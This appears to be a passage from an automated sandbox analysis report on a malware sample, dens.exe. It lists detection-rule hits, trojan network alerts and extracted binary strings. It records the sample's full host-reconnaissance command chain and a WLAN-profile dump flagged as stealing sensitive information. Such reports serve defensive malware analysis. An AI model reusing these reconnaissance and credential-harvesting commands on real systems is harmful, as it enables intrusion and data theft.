            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe Get-Clipboard, CommandLine: powershell.exe Get-Clipboard, CommandLine|base64offset|contains: ~Xn, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1352, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe Get-Clipboard, ProcessId: 1900, ProcessName: powershell.exe
            Source: Process startedAuthor: frack113: Data: Command: sc query type= service state= all, CommandLine: sc query type= service state= all, CommandLine|base64offset|contains: , Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 3652, ParentProcessName: cmd.exe, ProcessCommandLine: sc query type= service state= all, ProcessId: 7916, ProcessName: sc.exe
            Source: Process startedAuthor: frack113: Data: Command: hostname, CommandLine: hostname, CommandLine|base64offset|contains: -, Image: C:\Windows\System32\HOSTNAME.EXE, NewProcessName: C:\Windows\System32\HOSTNAME.EXE, OriginalFileName: C:\Windows\System32\HOSTNAME.EXE, ParentCommandLine: C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 3652, ParentProcessName: cmd.exe, ProcessCommandLine: hostname, ProcessId: 7380, ProcessName: HOSTNAME.EXE
            Source: Process startedAuthor: frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io': Data: Command: C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config", CommandLine: C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\dens.exe", ParentImage: C:\Users\user\Desktop\dens.exe, ParentProcessId: 6500, ParentProcessName: dens.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user admin
            Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7256, ProcessName: svchost.exe

            Stealing of Sensitive Information

            barindex
            Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\cmd.exe /c "netsh wlan show profiles", CommandLine: C:\Windows\system32\cmd.exe /c "netsh wlan show profiles", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\dens.exe", ParentImage: C:\Users\user\Desktop\dens.exe, ParentProcessId: 6500, ParentProcessName: dens.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "netsh wlan show profiles", ProcessId: 3488, ProcessName: cmd.exe
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-13T00:38:46.672880+010020229301A Network Trojan was detected4.175.87.197443192.168.2.449744TCP
            2024-11-13T00:39:26.467794+010020229301A Network Trojan was detected4.175.87.197443192.168.2.449763TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-13T00:38:58.408138+010028572871A Network Trojan was detected185.199.108.133443192.168.2.449757TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: C:\Users\user\AppData\Local\WaltuhiumUpdateService\Waltuhium.exeReversingLabs: Detection: 39%
            Source: dens.exeReversingLabs: Detection: 39%
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 89.8% probability

            Phishing

            barindex
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net user administrator
            Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 user administrator
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net user administrator
            Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 user administrator
            Source: C:\Users\user\Desktop\dens.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62482\setuptools\_vendor\wheel-0.43.0.dist-info\LICENSE.txtJump to behavior
            Source: C:\Users\user\Desktop\dens.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62482\wheel-0.43.0.dist-info\LICENSE.txtJump to behavior
            Source: dens.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
            Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: dens.exe, 00000000.00000003.1666353635.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: cryptography_rust.pdbc source: dens.exe, 00000001.00000002.2068229135.00007FFDFA867000.00000002.00000001.01000000.00000026.sdmp
            Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: dens.exe, 00000000.00000003.1664185093.00000107DAD65000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-file-l1-2-0.dll.0.dr
            Source: Binary string: api-ms-win-core-debug-l1-1-0.pdb source: dens.exe, 00000000.00000003.1663980456.00000107DAD65000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: dens.exe, 00000000.00000003.1665572074.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-sysinfo-l1-1-0.dll.0.dr
            Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: dens.exe, 00000000.00000003.1665989863.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-filesystem-l1-1-0.dll.0.dr
            Source: Binary string: api-ms-win-core-memory-l1-1-0.pdbGCTL source: dens.exe, 00000000.00000003.1664659823.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdbGCTL source: dens.exe, 00000000.00000003.1666061436.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: dens.exe, 00000000.00000003.1664385796.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-heap-l1-1-0.dll.0.dr
            Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG" source: dens.exe, 00000001.00000002.2068229135.00007FFDFA867000.00000002.00000001.01000000.00000026.sdmp
            Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdb source: dens.exe, 00000000.00000003.1661475799.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: dens.exe, 00000000.00000003.1665921025.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdbGCTL source: dens.exe, 00000000.00000003.1665989863.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-filesystem-l1-1-0.dll.0.dr
            Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: dens.exe, 00000000.00000003.1665091592.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-crt-time-l1-1-0.pdbGCTL source: dens.exe, 00000000.00000003.1666599668.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-core-console-l1-1-0.pdb source: dens.exe, 00000000.00000003.1663850239.00000107DAD65000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdbGCTL source: dens.exe, 00000000.00000003.1665639486.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdbGCTL source: dens.exe, 00000000.00000003.1665022014.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: dens.exe, 00000000.00000003.1662552489.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: dens.exe, 00000000.00000003.1665234767.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-profile-l1-1-0.dll.0.dr
            Source: Binary string: api-ms-win-core-file-l1-1-0.pdbGCTL source: dens.exe, 00000000.00000003.1664117143.00000107DAD65000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdbGCTL source: dens.exe, 00000000.00000003.1665921025.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: dens.exe, 00000000.00000003.1666599668.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: dens.exe, 00000000.00000003.1664318244.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdbGCTL source: dens.exe, 00000000.00000003.1665572074.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-sysinfo-l1-1-0.dll.0.dr
            Source: Binary string: ossl_ec_GFp_simple_group_set_curvecrypto\ec\ecp_smpl.cossl_ec_GFp_simple_group_check_discriminantossl_ec_GFp_simple_point_set_affine_coordinatesossl_ec_GFp_simple_point_get_affine_coordinatesossl_ec_GFp_simple_make_affineossl_ec_GFp_simple_points_make_affineossl_ec_GFp_simple_field_invossl_ec_GFp_simple_blind_coordinatescrypto\buffer\buffer.cBUF_MEM_growBUF_MEM_grow_cleancompiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG";CPUINFO: OPENSSL_ia32cap=0x%llx:0x%llxOPENSSL_ia32cap env:%sos-specific.dllCPUINFO: crypto\initthread.cOPENSSL_ia32cap` source: dens.exe, 00000001.00000002.2068229135.00007FFDFA867000.00000002.00000001.01000000.00000026.sdmp
            Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: dens.exe, 00000000.00000003.1665506325.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: dens.exe, 00000000.00000003.1665022014.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_overlapped.pdb source: dens.exe, 00000000.00000003.1662792406.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: dens.exe, 00000000.00000003.1661110438.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: dens.exe, 00000000.00000003.1664590602.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-localization-l1-2-0.dll.0.dr
            Source: Binary string: api-ms-win-core-string-l1-1-0.pdbGCTL source: dens.exe, 00000000.00000003.1665368820.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-crt-string-l1-1-0.pdbGCTL source: dens.exe, 00000000.00000003.1666519024.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: dens.exe, 00000000.00000003.1665157382.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-processthreads-l1-1-1.dll.0.dr
            Source: Binary string: api-ms-win-core-debug-l1-1-0.pdbGCTL source: dens.exe, 00000000.00000003.1663980456.00000107DAD65000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdbGCTL source: dens.exe, 00000000.00000003.1664523044.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-core-localization-l1-2-0.pdbGCTL source: dens.exe, 00000000.00000003.1664590602.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-localization-l1-2-0.dll.0.dr
            Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: dens.exe, 00000000.00000003.1664725190.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: dens.exe, 00000000.00000003.1676466121.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr
            Source: Binary string: k1k2k3X9_62_PENTANOMIALp.otherp.onBasisp.tpBasisp.ppBasismX9_62_CHARACTERISTIC_TWOp.primep.char_twofieldTypeX9_62_FIELDIDX9_62_CURVEfieldIDcurvebaseECPARAMETERSvalue.named_curvevalue.parametersvalue.implicitlyCAECPKPARAMETERSprivateKeyparameterspublicKeyEC_PRIVATEKEYec_asn1_group2fieldidcrypto\ec\ec_asn1.cec_asn1_group2curveEC_GROUP_get_ecparametersEC_GROUP_get_ecpkparametersEC_GROUP_new_from_ecparametersEC_GROUP_new_from_ecpkparametersi2d_ECPKParametersd2i_ECPrivateKeyi2d_ECPrivateKeyi2d_ECParametersd2i_ECParameterso2i_ECPublicKeyi2o_ECPublicKeycompiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG"3.3.2built on: Tue Sep 3 19:22:24 2024 UTCplatform: VC-WIN64AOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-3"MODULESDIR: "C:\Program Files\OpenSSL\lib\ossl-modules"CPUINFO: N/Anot availablecrypto\init.cOPENSSL_init_cryptocrypto\bio\bio_lib.cBIO_new_exbio_read_internbio_write_internBIO_sendmmsgBIO_recvmmsgBIO_putsBIO_getsBIO_get_line BIO_ctrlBIO_callback_ctrlBIO_find_type source: dens.exe, 00000001.00000002.2068229135.00007FFDFA867000.00000002.00000001.01000000.00000026.sdmp
            Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: dens.exe, 00000000.00000003.1665300726.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-core-console-l1-1-0.pdbGCTL source: dens.exe, 00000000.00000003.1663850239.00000107DAD65000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: dens.exe, 00000000.00000003.1666268915.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-process-l1-1-0.dll.0.dr
            Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdbGCTL source: dens.exe, 00000000.00000003.1666675608.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_uuid.pdb source: dens.exe, 00000000.00000003.1663289848.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, _uuid.pyd.0.dr
            Source: Binary string: D:\a\1\b\bin\amd64\_wmi.pdb source: dens.exe, 00000000.00000003.1663365617.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, _wmi.pyd.0.dr
            Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: dens.exe, 00000000.00000003.1664454967.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-interlocked-l1-1-0.dll.0.dr
            Source: Binary string: api-ms-win-core-synch-l1-1-0.pdbGCTL source: dens.exe, 00000000.00000003.1665435710.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdbGCTL source: dens.exe, 00000000.00000003.1665300726.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_wmi.pdb''&GCTL source: dens.exe, 00000000.00000003.1663365617.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, _wmi.pyd.0.dr
            Source: Binary string: 7C:\Users\user\AppData\Local\Temp\mugnbzbx\mugnbzbx.pdb source: powershell.exe, 00000052.00000002.1892866312.00000217AE943000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: dens.exe, 00000000.00000003.1666061436.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: dens.exe, 00000000.00000003.1666519024.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: dens.exe, 00000000.00000003.1666130356.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: dens.exe, 00000000.00000003.1664659823.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: dens.exe, 00000000.00000003.1666432610.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: dens.exe, 00000000.00000003.1661110438.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_multiprocessing.pdb source: dens.exe, 00000000.00000003.1662659826.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: dens.exe, 00000000.00000003.1665708925.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-util-l1-1-0.dll.0.dr
            Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: dens.exe, 00000000.00000003.1665435710.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-core-heap-l1-1-0.pdbGCTL source: dens.exe, 00000000.00000003.1664385796.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-heap-l1-1-0.dll.0.dr
            Source: Binary string: api-ms-win-crt-math-l1-1-0.pdbGCTL source: dens.exe, 00000000.00000003.1666196697.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-math-l1-1-0.dll.0.dr
            Source: Binary string: api-ms-win-core-handle-l1-1-0.pdbGCTL source: dens.exe, 00000000.00000003.1664318244.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: dens.exe, 00000000.00000003.1662453626.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdbGCTL source: dens.exe, 00000000.00000003.1665091592.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: dens.exe, 00000000.00000003.1664047310.00000107DAD65000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: 7C:\Users\user\AppData\Local\Temp\mugnbzbx\mugnbzbx.pdbhP" source: powershell.exe, 00000052.00000002.1892866312.00000217AE943000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-core-file-l1-1-0.pdb source: dens.exe, 00000000.00000003.1664117143.00000107DAD65000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_asyncio.pdb source: dens.exe, 00000000.00000003.1661560840.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-core-synch-l1-2-0.pdbGCTL source: dens.exe, 00000000.00000003.1665506325.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-crt-process-l1-1-0.pdbGCTL source: dens.exe, 00000000.00000003.1666268915.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-process-l1-1-0.dll.0.dr
            Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: dens.exe, 00000000.00000003.1665849743.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-core-util-l1-1-0.pdbGCTL source: dens.exe, 00000000.00000003.1665708925.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-util-l1-1-0.dll.0.dr
            Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdbGCTL source: dens.exe, 00000000.00000003.1663915027.00000107DAD65000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: dens.exe, 00000000.00000003.1661942418.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdbGCTL source: dens.exe, 00000000.00000003.1664047310.00000107DAD65000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: dens.exe, 00000000.00000003.1662940240.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: cryptography_rust.pdb source: dens.exe, 00000001.00000002.2068229135.00007FFDFA867000.00000002.00000001.01000000.00000026.sdmp
            Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdbGCTL source: dens.exe, 00000000.00000003.1665849743.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdbGCTL source: dens.exe, 00000000.00000003.1666432610.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdbGCTL source: dens.exe, 00000000.00000003.1661475799.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: dens.exe, 00000000.00000003.1691479731.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000002.2068579406.00007FFDFAB5F000.00000002.00000001.01000000.0000001B.sdmp
            Source: Binary string: api-ms-win-core-profile-l1-1-0.pdbGCTL source: dens.exe, 00000000.00000003.1665234767.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-profile-l1-1-0.dll.0.dr
            Source: Binary string: api-ms-win-core-file-l1-2-0.pdbGCTL source: dens.exe, 00000000.00000003.1664185093.00000107DAD65000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-file-l1-2-0.dll.0.dr
            Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: dens.exe, 00000000.00000003.1663915027.00000107DAD65000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: dens.exe, 00000000.00000003.1665779625.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-conio-l1-1-0.dll.0.dr
            Source: Binary string: D:\a\1\b\bin\amd64\sqlite3.pdb source: dens.exe, 00000001.00000002.2069180687.00007FFDFACA5000.00000002.00000001.01000000.00000017.sdmp
            Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: dens.exe, 00000000.00000003.1666196697.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-math-l1-1-0.dll.0.dr
            Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdbGCTL source: dens.exe, 00000000.00000003.1664454967.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-interlocked-l1-1-0.dll.0.dr
            Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdbGCTL source: dens.exe, 00000000.00000003.1666130356.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: dens.exe, 00000000.00000003.1666675608.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: dens.exe, 00000000.00000003.1665639486.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: dens.exe, 00000000.00000003.1665368820.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: dens.exe, 00000000.00000003.1664254134.00000107DAD65000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: dens.exe, 00000000.00000003.1662552489.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: dens.exe, 00000000.00000003.1664523044.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp
